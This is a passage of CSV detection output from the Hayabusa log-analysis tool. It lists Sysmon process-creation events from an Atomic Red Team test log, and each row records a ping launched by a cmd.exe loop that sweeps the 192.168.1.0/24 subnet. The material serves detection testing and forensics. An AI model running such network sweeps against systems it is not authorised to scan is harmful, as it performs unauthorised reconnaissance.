C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.019 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.537 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.019 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.547 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.990 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 